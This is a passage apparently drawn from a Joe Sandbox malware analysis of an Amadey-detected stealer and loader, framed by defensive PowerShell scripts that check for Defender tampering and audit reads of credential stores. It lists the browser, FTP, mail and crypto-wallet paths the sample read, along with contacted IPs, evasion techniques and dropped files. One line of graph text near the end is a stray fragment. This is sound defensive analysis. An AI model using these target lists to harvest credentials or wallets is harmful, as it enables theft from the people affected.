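
# 1. Per-GPO registry cache in HKCU, where the sample staged its policy
#    (subkeys are named {GUID}Machine or {GUID}User).
$gpoCache = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects'
if (Test-Path -LiteralPath $gpoCache) {
    foreach ($gpo in Get-ChildItem -LiteralPath $gpoCache) {
        $defKey = Join-Path $gpo.PSPath 'SOFTWARE\Policies\Microsoft\Windows Defender'
        Test-DefenderPolicyKey -KeyPath $defKey -Origin "HKCU GPO cache ($($gpo.PSChildName))"
    }
}

# 2. Applied machine policy, which is what Defender honours once policy has been processed.
Test-DefenderPolicyKey -KeyPath 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Origin 'HKLM policy'

# 3. The local GPO descriptor the sample rewrote: a recent write with no admin change is a red flag.
$gpt = 'C:\Windows\System32\GroupPolicy\gpt.ini'
if (Test-Path -LiteralPath $gpt) {
    $gptInfo = Get-Item -LiteralPath $gpt
    $version = (Get-Content -LiteralPath $gpt | Where-Object { $_ -match '^Version=' }) -join ','
    Write-Host ("gpt.ini last written {0}; {1}" -f $gptInfo.LastWriteTime, $version)
}

# 4. Live Defender state; the cmdlets exist only where the Defender module is installed.
try {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    Write-Host ("RealTimeProtectionEnabled={0} AntivirusEnabled={1} DisableRealtimeMonitoring={2}" -f
        $status.RealTimeProtectionEnabled, $status.AntivirusEnabled, $pref.DisableRealtimeMonitoring)
    if ($pref.ExclusionExtension) {
        Write-Host ("ExclusionExtension: {0}" -f ($pref.ExclusionExtension -join ', '))
    }
} catch {
    Write-Host "Defender cmdlets unavailable: $($_.Exception.Message)"
}

if ($findings.Count) { $findings | Format-Table -AutoSize }
else { Write-Host 'No Defender policy tampering values found.' }
```

When cleaning up, remove the values from the HKCU Group Policy Objects cache as well as from HKLM\SOFTWARE\Policies, then run gpupdate /force; deleting only the HKLM copy leaves the staged policy in place to be re-applied at the next refresh. The Exclusions_Extensions value is only the policy switch, the excluded extensions themselves sit under Exclusions\Extensions, which is why the script walks those subkeys too.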

Stealing of Sensitive Information

Source: Yara match | File source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
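The file and key opens above are the stealer's shopping list: browser SQLite stores (Login Data, Cookies, History, Web Data; Firefox cookies.sqlite and places.sqlite with their -shm/-wal side files), FileZilla's recentservers.xml, a fixed set of wallet directories and the Outlook MAPI profile keys. Because these paths are static, they make good audited canaries: a process other than the owning application opening them is a strong signal. The script below is an added example written for this page, not code from the report or the sample. It puts a read-audit SACL on the stores the report lists (resolved for the current profile) so that every read produces Security event 4663, and then lists 4663 readers that are not on an allow list of expected processes. The allow list is an assumption to tune per host; run it from an elevated PowerShell.

```powershell
# Added example (not from the Joe Sandbox report): audit reads of the credential stores and
# wallet folders the stealer opened, then surface readers other than the owning application.

# 4663 is only logged when the File System subcategory of Object Access auditing is enabled.
auditpol /set /subcategory:"File System" /success:enable | Out-Null

# Report paths, resolved for the current user profile.
$targets = @(
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data",
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies",
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data",
    "$env:APPDATA\Mozilla\Firefox\Profiles",        # cookies.sqlite / places.sqlite live below here
    "$env:APPDATA\FileZilla\recentservers.xml",
    "$env:APPDATA\Electrum\wallets",
    "$env:APPDATA\Exodus\exodus.wallet"
)
# Processes expected to read their own store (assumption; extend for backup agents, indexers).
$allowedReaders = @('chrome.exe', 'msedge.exe', 'firefox.exe', 'filezilla.exe', 'electrum.exe', 'Exodus.exe')

function Add-ReadAudit {
    param([string]$Path)
    # Audit successful ReadData by Everyone; for directories the rule propagates to children.
    $everyone = [System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')
    $isDir    = Test-Path -LiteralPath $Path -PathType Container
    $inherit  = if ($isDir) { 'ContainerInherit, ObjectInherit' } else { 'None' }
    $rule = [System.Security.AccessControl.FileSystemAuditRule]::new(
        $everyone, 'ReadData', $inherit, 'None', 'Success')
    $acl = Get-Acl -LiteralPath $Path -Audit      # -Audit pulls the SACL (needs SeSecurityPrivilege)
    $acl.AddAuditRule($rule)
    Set-Acl -LiteralPath $Path -AclObject $acl
}

foreach ($t in $targets) {
    if (Test-Path -LiteralPath $t) { Add-ReadAudit -Path $t }
}

function Get-UnexpectedStoreReads {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    $filter = @{ LogName = 'Security'; Id = 4663; StartTime = $Since }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # Pull the named EventData fields (ObjectName, ProcessName, ...) out of the event XML.
        $d = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $object = $d['ObjectName']
        $proc   = Split-Path -Leaf $d['ProcessName']
        $onTarget = $targets | Where-Object { $object -like "$_*" }
        if ($onTarget -and ($allowedReaders -notcontains $proc)) {
            [pscustomobject]@{
                Time = $e.TimeCreated; Process = $d['ProcessName']; Pid = [int]$d['ProcessId']
                User = $d['SubjectUserName']; Object = $object; AccessMask = $d['AccessMask']
            }
        }
    }
}

Get-UnexpectedStoreReads | Format-Table -AutoSize
```

In this report the readers would have been u5v8.0.exe and u69w.0.exe from %TEMP% and F0mqqGl9pK9gdOm2cnZsC1mR.exe from Documents\SimpleAdobe, none of which belong on the allow list. Stealers that copy the database before parsing it (the report shows u5v8.0.exe dropping nss3.dll, mozglue.dll and softokn3.dll to decrypt Firefox data) still have to read the original, so the copy itself raises the event. Keep the SACL scope tight: auditing a whole Firefox profile directory is noisy, and a flood of 4663 events can roll the Security log before anyone looks at it.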

Remote Access Functionality

Source: Yara match | File source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
ATT&CK Matrix

Techniques are listed per tactic column of the matrix. A number in parentheses is the count of matched signatures for that technique; techniques without a number are matrix placeholders that were not observed in this analysis.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: Windows Management Instrumentation (2); Shared Modules (1); Command and Scripting Interpreter (2); Scheduled Task/Job (11); PowerShell (1); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: Scripting (11); DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (2); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (412); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (2); At; Cron; Launchd; Scheduled Task; Systemd Timers
Defense Evasion: Disable or Modify Tools (51); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); Install Root Certificate (1); Software Packing (2); DLL Side-Loading (1); Bypass User Account Control (1); File Deletion (1); Masquerading (31); Virtualization/Sandbox Evasion (361); Access Token Manipulation (1); Process Injection (412)
Credential Access: OS Credential Dumping (2); Credential API Hooking (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: System Time Discovery (1); File and Directory Discovery (4); System Information Discovery (177); Query Registry (1); Security Software Discovery (971); Virtualization/Sandbox Evasion (361); Process Discovery (3); Application Window Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (1); Data from Local System (3); Email Collection (1); Credential API Hooking (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Application Layer Protocol (1); Proxy (1); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1430552; Sample: file.exe; Start date: 23/04/2024; Architecture: WINDOWS; Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures

Process tree as drawn in the graph (child processes indented under their parent; per-node dropped files, contacted IPs and signatures as listed on that node; the two counters after a process name are the legend's "created registry values" and "created files"):

file.exe
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; Injects a PE file into a foreign processes
  AddInProcess32.exe (15 registry values, 405 files created)
    Network: 107.167.110.211 (OPERASOFTWAREUS, United States); 107.167.110.216 (OPERASOFTWAREUS, United States); 13 other IPs or domains
    Dropped: C:\Users\...\zWhvfqZrtT7TUoWor4gRArPv.exe (PE32); C:\Users\...\zUOgRazdYnb35XHU4UIsV9Yc.exe (PE32); C:\Users\...\zFZkiprzkq8Ae7mkklwscu5a.exe (MS-DOS); 246 other malicious files
    Signatures: Installs new ROOT certificates; Drops script or batch files to the startup folder; Creates HTML files with .exe extension (expired dropper behavior); Writes many files with high entropy
    9wqoiPpK0NIQEBygxfm6h42G.exe
      Network: 87.240.137.164 (VKONTAKTE-SPB-AShttpvkcomRU, Russian Federation); 95.142.206.0 (VKONTAKTE-SPB-AShttpvkcomRU, Russian Federation); 18 other IPs or domains
      Dropped: C:\Users\...\urA10ZckYEEXLZZov5c00RO_.exe (PE32); C:\Users\...\s2mORnBj3q8nWakBtFzD2977.exe (PE32); C:\Users\...\Zsk2cFkeBC4UsceqkHvvw1iU.exe (PE32); 22 other malicious files
      Signatures: Query firmware table information (likely to detect VMs); Drops PE files to the document folder of the user; Creates HTML files with .exe extension (expired dropper behavior); 8 other signatures
      F0mqqGl9pK9gdOm2cnZsC1mR.exe
        Signatures: Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); Disables Windows Defender (deletes autostart); 7 other signatures
      UWxz0MPLJemfxFfuxrp6E5vU.exe
        Network: 193.233.132.253 (FREE-NET-ASFREEnetEU, Russian Federation); 172.67.75.166 (CLOUDFLARENETUS, United States)
        Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    VtmtVe55Jwcf3rOGIU1yezyh.exe (1 registry value, 4 files created)
      Network: 3 other IPs or domains
      Dropped: 3 other malicious files
      Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
      u5v8.0.exe
        Network: 185.172.128.76 (NADYMSS-ASRU, Russian Federation)
        Dropped: C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\nss3[1].dll (PE32); C:\Users\user\AppData\...\mozglue[1].dll (PE32); 9 other files (5 malicious)
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
      Qg_Appv5.exe
        Dropped: C:\Users\user\AppData\Local\...\relay.dll (PE32); C:\Users\user\...\UniversalInstaller.exe (PE32); C:\Users\user\AppData\...\UIxMarketPlugin.dll (PE32); C:\Users\user\AppData\Local\Temp\ff086fda (PNG)
        Signatures: Writes many files with high entropy; Found direct / indirect Syscall (likely to bypass EDR)
    i7gUU3MlvTwbsK8r3hAjzW0p.exe
      Dropped: 4 other malicious files
      Install.exe
        Dropped: C:\Users\user\AppData\Local\...\koEMGMU.exe (PE32)
        Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
        forfiles.exe
          cmd.exe
          conhost.exe
        schtasks.exe
          conhost.exe
    16 other processes
      Network: 107.167.110.218 (OPERASOFTWAREUS, United States); 107.167.125.189 (OPERASOFTWAREUS, United States); 2 other IPs or domains
      Dropped: C:\Users\user\AppData\Local\Temp\u69w.1.exe (PE32); C:\Users\user\AppData\Local\Temp\u69w.0.exe (PE32); 20 other malicious files
      Signatures: Found Tor onion address; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes many files with high entropy; Found direct / indirect Syscall (likely to bypass EDR)
      u69w.0.exe
      u69w.1.exe
        Signatures: Checks if the current machine is a virtual machine (disk enumeration)
      u4dc.0.exe
  conhost.exe
cmd.exe
  H6XhhPCeuwAb2QQK3C3B1Lwl.exe
    Dropped: C:\Users\user\AppData\Local\Temp\u2r8.1.exe (PE32); C:\Users\user\AppData\Local\Temp\u2r8.0.exe (PE32)
    Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
  conhost.exe
koEMGMU.exe
  Dropped: C:\Windows\Temp\...\JUnCNhn.exe (PE32)
3 other processes
182 Suspicious powershell command line found 67->182 74 powershell.exe 67->74         started        process21 process22 76 WMIC.exe 74->76         started       

Antivirus detection, initial sample
Source | Detection | Scanner | Label
file.exe | 58% | ReversingLabs | Win64.Trojan.Amadey

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe | 100% | Avira | HEUR/AGEN.1313019
C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe | 100% | Avira | HEUR/AGEN.1313019
C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe | 100% | Avira | HEUR/AGEN.1313019
C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe | 100% | Avira | HEUR/AGEN.1313019
C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe | 100% | Avira | HEUR/AGEN.1313019
C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe | 100% | Joe Sandbox ML |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
